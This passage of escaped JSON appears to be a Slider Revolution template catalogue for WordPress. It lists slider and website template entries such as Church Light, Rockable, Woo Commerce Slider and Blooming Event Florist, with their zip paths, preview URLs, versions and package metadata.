Community\",\"alias\":\"Church-Light-Community\",\"zip\":\"packs\\/Church-Light-Community.zip\",\"uid\":\"14fcc0d43d899fd96116bdbc57c7c5ea\",\"img\":\"Church-Light-Community\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-light\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-light\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Light Website Template\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"33\",\"installed\":false},\"383\":{\"id\":\"428\",\"title\":\"Church Light Sermon\",\"alias\":\"Church-Light-Sermon\",\"zip\":\"packs\\/Church-Light-Sermon.zip\",\"uid\":\"fc30be7e703bc7b235665c36baa80e4e\",\"img\":\"Church-Light-Sermon\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-light\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-light\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Light Website Template\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"33\",\"installed\":false},\"384\":{\"id\":\"429\",\"title\":\"Church Light Contacts\",\"alias\":\"Church-Light-Contacts\",\"zip\":\"packs\\/Church-Light-Contacts.zip\",\"uid\":\"ed83d8fa63ecb59cf42656068ecf8d25\",\"img\":\"Church-Light-Contacts\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-light\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-light\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Light Website Template\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"33\",\"installed\":false},\"385\":{\"id\":\"430\",\"title\":\"Church Light Footer\",\"alias\":\"Church-Light-Footer\",\"zip\":\"packs\\/Church-Light-Footer.zip\",\"uid\":\"a168772865fd5dcf6229c9c6a49dff73\",\"img\":\"Church-Light-Footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/church-website-template-light\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=church-website-template-light\",\"version\":\"1.0.1\",\"required\":\"6.1.2\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Church Website Template is a complete solution for the holy internet presence of your church. Available as a light and dark version.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Church Light Website Template\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"33\",\"installed\":false},\"386\":{\"id\":\"431\",\"title\":\"Rockable Website Template\",\"alias\":\"rockable-website-template\",\"zip\":\"\",\"uid\":\"rockable-website-template-package\",\"img\":\"packages\\/rockable-website-template.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/rockable-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=rockable-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.3\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Rockable Website Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"34\",\"installed\":false},\"387\":{\"id\":\"432\",\"title\":\"Rockable Menu\",\"alias\":\"rockable-menu\",\"zip\":\"packs\\/rockable-menu.zip\",\"uid\":\"92d18f7ff38f22ff411a4ef4d9f54934\",\"img\":\"rockable-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/rockable-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=rockable-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Rockable Website Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"34\",\"installed\":false},\"388\":{\"id\":\"433\",\"title\":\"Rockable Hero\",\"alias\":\"rockable-hero\",\"zip\":\"packs\\/rockable-hero.zip\",\"uid\":\"ba16b28d6bde95910cbce572bb251208\",\"img\":\"rockable-hero\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/rockable-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=rockable-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Rockable Website Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"34\",\"installed\":false},\"389\":{\"id\":\"434\",\"title\":\"Rockable Lineup\",\"alias\":\"rockable-lineup\",\"zip\":\"packs\\/rockable-lineup.zip\",\"uid\":\"6631980112805533a0d328c37e56adbd\",\"img\":\"rockable-lineup\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/rockable-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=rockable-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Rockable Website Template\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"34\",\"installed\":false},\"390\":{\"id\":\"435\",\"title\":\"Rockable Lineup 2\",\"alias\":\"rockable-lineup-2\",\"zip\":\"packs\\/rockable-lineup-2.zip\",\"uid\":\"98bc41d982dc478edabff4aa99461dbc\",\"img\":\"rockable-lineup-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/rockable-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=rockable-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Rockable Website Template\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"34\",\"installed\":false},\"391\":{\"id\":\"436\",\"title\":\"Rockable Gallery Title\",\"alias\":\"rockable-gallery-title\",\"zip\":\"packs\\/rockable-gallery-title.zip\",\"uid\":\"da43a76f5bc77aa6efe158b00ab7cf0d\",\"img\":\"rockable-gallery-title\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/rockable-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=rockable-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Rockable Website Template\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"34\",\"installed\":false},\"392\":{\"id\":\"437\",\"title\":\"Rockable Gallery\",\"alias\":\"rockable-gallery\",\"zip\":\"packs\\/rockable-gallery.zip\",\"uid\":\"c12a144d6860bcf24e91d5b980ac22f1\",\"img\":\"rockable-gallery\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/rockable-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=rockable-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Rockable Website Template\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"34\",\"installed\":false},\"393\":{\"id\":\"438\",\"title\":\"Rockable Sponsors\",\"alias\":\"rockable-sponsors\",\"zip\":\"packs\\/rockable-sponsors.zip\",\"uid\":\"1e40d4a810c23f8d5fe5cd5ca31ee20d\",\"img\":\"rockable-sponsors\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/rockable-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=rockable-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Rockable Website Template\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"34\",\"installed\":false},\"394\":{\"id\":\"439\",\"title\":\"Rockable Footer\",\"alias\":\"rockable-footer\",\"zip\":\"packs\\/rockable-footer.zip\",\"uid\":\"a4a9952d5e56fc14366155e8ebfa432a\",\"img\":\"rockable-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/rockable-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=rockable-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Rockable Website Template\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"34\",\"installed\":false},\"395\":{\"id\":\"440\",\"title\":\"Rockable Detail Modal\",\"alias\":\"rockable-detail-modal\",\"zip\":\"packs\\/rockable-detail-modal.zip\",\"uid\":\"b51d918203ff7975a144a9f1be09f31b\",\"img\":\"rockable-detail-modal\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/rockable-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=rockable-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Rockable Website Template\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"34\",\"installed\":false},\"396\":{\"id\":\"441\",\"title\":\"Rockable Detail Modal 2\",\"alias\":\"rockable-detail-modal-2\",\"zip\":\"packs\\/rockable-detail-modal-2.zip\",\"uid\":\"dcf51ebb3d4a1dec94748a1e016c5ef7\",\"img\":\"rockable-detail-modal-2\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/rockable-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=rockable-website-template\",\"version\":\"1.0.1\",\"required\":\"6.1.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Rockable Website Template can present your Festival or Concert oriented website in a unique one-pager.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Rockable Website Template\",\"package_order\":\"10\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"34\",\"installed\":false},\"397\":{\"id\":\"442\",\"title\":\"Real Estate Showcase Slider\",\"alias\":\"real-estate-showcase-slider\",\"zip\":\"real-estate-showcase-slider.zip\",\"uid\":\"486b2bbe296722e70421731e3c05711b\",\"img\":\"Real-Estate-Showcase-Slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/real-estate-showcase-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=real-estate-showcase-slider\",\"version\":\"1.0.2\",\"required\":\"6.1.3\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">An elegant showcase for your real estate & realtor website. Flexible and customizable.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"398\":{\"id\":\"443\",\"title\":\"Isometric Slider\",\"alias\":\"isometric-slider\",\"zip\":\"isometric-slider.zip\",\"uid\":\"fb06051fcf6649a44f2292044e414a36\",\"img\":\"isometric-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/isometric-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=isometric-slider\",\"version\":\"1.0.2\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A colorful, isometric slider template with fully customizable colors and screen content.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"399\":{\"id\":\"444\",\"title\":\"Woo Commerce Slider Static\",\"alias\":\"woo-commerce-slider-static\",\"zip\":\"\",\"uid\":\"woo-commerce-slider-static\",\"img\":\"packages\\/woo-commerce-slider-static.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/woo-commerce-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woo-commerce-slider\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">A uniquely animated Woo Commerce Slider template - this is the static version that doesn\'t use Woo Commerce data<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\",\"woocommerce\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Woo Commerce Slider Static\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"35\",\"installed\":false},\"400\":{\"id\":\"445\",\"title\":\"E-Commerce Slider\",\"alias\":\"E-Commerce-Slider\",\"zip\":\"packs\\/E-Commerce-Slider.zip\",\"uid\":\"1533cfd83c2ae122f23074e1ed77f256\",\"img\":\"E-Commerce-Slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/woo-commerce-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woo-commerce-slider\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A uniquely animated Woo Commerce Slider template - this is the static version that doesn\'t use Woo Commerce data<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\",\"woocommerce\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Woo Commerce Slider Static\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"35\",\"installed\":false},\"401\":{\"id\":\"446\",\"title\":\"E-Commerce Slider Modal\",\"alias\":\"E-Commerce-Slider-Modal\",\"zip\":\"packs\\/E-Commerce-Slider-Modal.zip\",\"uid\":\"825e05c3967515b92a75da017c68a863\",\"img\":\"E-Commerce-Slider-Modal\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/woo-commerce-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woo-commerce-slider\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A uniquely animated Woo Commerce Slider template - this is the static version that doesn\'t use Woo Commerce data<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\",\"woocommerce\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Woo Commerce Slider Static\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"1\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"35\",\"installed\":false},\"402\":{\"id\":\"447\",\"title\":\"Woo Commerce Slider Dynamic\",\"alias\":\"Woo-Commerce-Slider-Dynamic\",\"zip\":\"Woo-Commerce-Slider-Dynamic.zip\",\"uid\":\"b8e2c64f3739e552c563c48c59f20fe7\",\"img\":\"Woo-Commerce-Slider-Dynamic\\/slide1.jpg\",\"preview\":\"https:\\/\\/www.sliderrevolution.com\\/templates\\/woo-commerce-slider\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=woo-commerce-slider\",\"version\":\"1.0.1\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">A uniquely animated Woo Commerce Slider template - this is the dynamic version that uses Woo Commerce data<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"woocommerce\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"403\":{\"id\":\"448\",\"title\":\"Blooming Event Florist Template\",\"alias\":\"blooming-event-florist-template\",\"zip\":\"\",\"uid\":\"blooming-event-florist-template-package\",\"img\":\"packages\\/blooming-event-florist-template-package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/event-florist-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-florist-template\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Blooming Event Florist Template\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"36\",\"installed\":false},\"404\":{\"id\":\"449\",\"title\":\"Blooming Header\",\"alias\":\"blooming-header\",\"zip\":\"packs\\/blooming-header.zip\",\"uid\":\"aa2ee34fd8ed018945ba64e6913810e4\",\"img\":\"blooming-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/event-florist-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-florist-template\",\"version\":\"1.0.1\",\"required\":\"6.4.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Blooming Event Florist Template\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"36\",\"installed\":false},\"405\":{\"id\":\"450\",\"title\":\"Blooming About\",\"alias\":\"blooming-about\",\"zip\":\"packs\\/blooming-about.zip\",\"uid\":\"dd7095e46fab2eb475d00480fd17a6ec\",\"img\":\"blooming-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/event-florist-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-florist-template\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Blooming Event Florist Template\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"36\",\"installed\":false},\"406\":{\"id\":\"451\",\"title\":\"Blooming Portfolio\",\"alias\":\"blooming-portfolio\",\"zip\":\"packs\\/blooming-portfolio.zip\",\"uid\":\"c72ddcbb07b62982b8c21328a6383e22\",\"img\":\"blooming-portfolio\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/event-florist-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-florist-template\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Blooming Event Florist Template\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"36\",\"installed\":false},\"407\":{\"id\":\"452\",\"title\":\"Blooming Wedding Title\",\"alias\":\"blooming-wedding-title\",\"zip\":\"packs\\/blooming-wedding-title.zip\",\"uid\":\"4fcfb0b99289c12d014c67306bb7687b\",\"img\":\"blooming-wedding-title\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/event-florist-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-florist-template\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Blooming Event Florist Template\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"36\",\"installed\":false},\"408\":{\"id\":\"453\",\"title\":\"Blooming Wedding Carousel\",\"alias\":\"blooming-wedding-carousel\",\"zip\":\"packs\\/blooming-wedding-carousel.zip\",\"uid\":\"1d1bb979dbfca8ba9d43da1c0f665339\",\"img\":\"blooming-wedding-carousel\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/event-florist-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=event-florist-template\",\"version\":\"1.0.0\",\"required\":\"6.1.5\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Blooming Event Florist Template is a complete one-page website solution with beautiful floral animations.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"carousel\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Blooming Event Florist Template\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"36\",\"installed\":false},\"409\":{\"id\":\"454\",\"title\":\"Blooming Wedding 